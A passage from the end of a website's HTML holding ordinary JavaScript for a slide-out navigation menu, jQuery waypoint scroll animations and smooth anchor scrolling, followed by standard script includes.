document.getElementById("closebtn").style.opacity = "0";
document.getElementById("closediv").style.opacity = "0";
document.getElementById("divMH").style.opacity = "0";
document.getElementById("divMH").style.transition = "0.2s";
}
}else{
function openNav() {
document.getElementById("mySidenav").style.width = "100%";
document.getElementById("main").style.marginRight = "0";
document.body.style.backgroundColor = "white";
document.getElementById("openbtn").style.opacity = "0";
document.getElementById("closebtn").style.display = "block";
document.getElementById("closebtn").style.opacity = "1";
document.getElementById("closediv").style.opacity = "1";
document.getElementById("divMH").style.opacity = "1";
}
function closeNav() {
document.getElementById("mySidenav").style.width = "0";
document.getElementById("main").style.marginRight= "0";
document.body.style.backgroundColor = "white";
document.getElementById("openbtn").style.opacity = "1";
document.getElementById("closebtn").style.display = "none";
document.getElementById("closebtn").style.opacity = "0";
document.getElementById("closediv").style.opacity = "0";
document.getElementById("divMH").style.opacity = "0";
}
}
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
<script src="js/waypoints.min.js"></script>
<script type="text/javascript">
jQuery(function($) {
/*----------------left------------------*/
$('.izq').waypoint(function() {
$(this).toggleClass( 'bounceInLeft animated' );
},
{
offset: '70%',
triggerOnce: true
});
/*----------------left------------------*/
/*----------------abajo------------------*/
$('.abajo').waypoint(function() {
$(this).toggleClass( 'bounceInUp animated' );
},
{
offset: '70%',
triggerOnce: true
});
/*----------------abajo------------------*/
/*----------------derecha------------------*/
$('.der').waypoint(function() {
$(this).toggleClass( 'bounceInRight animated' );
},
{
offset: '70%',
triggerOnce: true
});
/*----------------derecha------------------*/
});
</script>
<!-- animate -->
<script>
$('a[href^="#"]').on('click', function(e) {
e.preventDefault();
var id = $(this).attr('href'),
targetOffset = $(id).offset().top;
$('html, body').animate({
scrollTop: targetOffset - 100
}, 500);
});
</script>
<!-- JS -->
<script type="text/javascript" src="js/jquery-1.11.2.min.js"></script>
<script type="text/javascript" src="js/jquery-migrate-1.2.1.min.js"></script>
<script type="text/javascript" src="js/bootstrap.min.js"></script>
<script type="text/javascript" src="js/plugins.min.js"></script>
<!--<script type="text/javascript" src="js/slide.js"></script>-->
<script type="text/javascript" src="js/main.js"></script>
</body>
</html>